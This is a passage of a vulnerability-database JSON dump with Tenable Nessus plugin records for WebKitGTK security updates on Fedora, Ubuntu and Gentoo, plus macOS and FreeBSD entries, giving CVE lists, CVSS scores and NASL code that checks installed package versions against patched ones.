gi?name=CVE-2017-13884),\n [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7160),\n [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7153),\n [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7161),\n [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43712163de\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.18.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:36:46", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4088), [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13885), [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7165), [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13884), [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7160), [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7153), [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7161), [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "nessus", "title": "Fedora 27 : webkitgtk4 (2018-3199135a7e)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-3199135A7E.NASL", "href": "https://www.tenable.com/plugins/nessus/106418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-3199135a7e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106418);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"FEDORA\", value:\"2018-3199135a7e\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2018-3199135a7e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4088),\n [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13885),\n [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7165),\n [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13884),\n [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7160),\n [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7153),\n [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7161),\n [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-3199135a7e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.18.6-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-13T14:30:16", "description": "Multiple security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the user interface, or execute arbitrary code. (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 : webkit2gtk vulnerabilities (USN-3551-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3551-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106534", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3551-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106534);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"USN\", value:\"3551-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 : webkit2gtk vulnerabilities (USN-3551-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit these to cause\na denial of service, spoof the user interface, or execute arbitrary\ncode. (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160,\nCVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3551-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.6-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.6-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:43:46", "description": "The remote host is affected by the vulnerability described in GLSA-201803-11 (WebKitGTK+: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details.\n Impact :\n\n An attacker could execute arbitrary commands via maliciously crafted web content.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-22T00:00:00", "type": "nessus", "title": "GLSA-201803-11 : WebKitGTK+: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201803-11.NASL", "href": "https://www.tenable.com/plugins/nessus/108526", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-11.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108526);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_xref(name:\"GLSA\", value:\"201803-11\");\n\n script_name(english:\"GLSA-201803-11 : WebKitGTK+: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-11\n(WebKitGTK+: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please\n review the referenced CVE identifiers for details.\n \nImpact :\n\n An attacker could execute arbitrary commands via maliciously crafted web\n content.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.18.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.18.6\"), vulnerable:make_list(\"lt 2.18.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:50", "description": "The remote host is running a version of macOS that is 10.13.x prior to 10.13.2. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-10T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-13826", "CVE-2017-13833", "CVE-2017-13844", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-9798"], "modified": "2019-04-10T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700513.PRM", "href": "https://www.tenable.com/plugins/nnm/700513", "sourceData": "Binary data 700513.prm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:32", "description": "The WebKit team reports many vulnerabilities.\n\nPlease reference the CVE/URL list for details.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 